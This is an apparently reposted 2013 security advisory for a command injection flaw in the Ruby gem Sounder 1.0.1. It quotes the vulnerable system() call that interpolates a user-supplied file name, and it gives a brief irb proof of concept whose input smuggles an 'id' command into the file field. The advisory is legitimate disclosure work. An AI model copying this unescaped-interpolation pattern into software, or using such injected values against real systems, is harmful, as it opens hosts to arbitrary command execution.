Ruby Gem Sounder 1.0.1 Command Injection

2013.08.28
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Command Injection in Ruby Gem Sounder 1.0.1 Date: 8/10/2013 Author: Larry W. Cashdollar @_larry0 Download: https://rubygems.org/gems/sounder CVE: TBD Description: Sounder is a ruby gem API for Mac OSX's afplay command. It passes user supplied data directly to command line. From lib/sounder/sound.rb: def play system %{/usr/bin/afplay "#{ () file}" &} end PoC: irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\"" => "\"id;/usr/bin/id>/tmp/p;\"" irb(main):099:0> system %{/bin/echo "#{ () file}" } id sh: 1: : Permission denied => false irb(main):100:0> larry () underfl0w:/tmp$ cat /tmp/p uid=1000(larry) gid=600(staff) groups=600(user) Author Notified: 8/9/2013 Advisory: http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html

References:

http://vapid.dhs.org/advisories/sounder-ruby-gem-cmd-inj.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top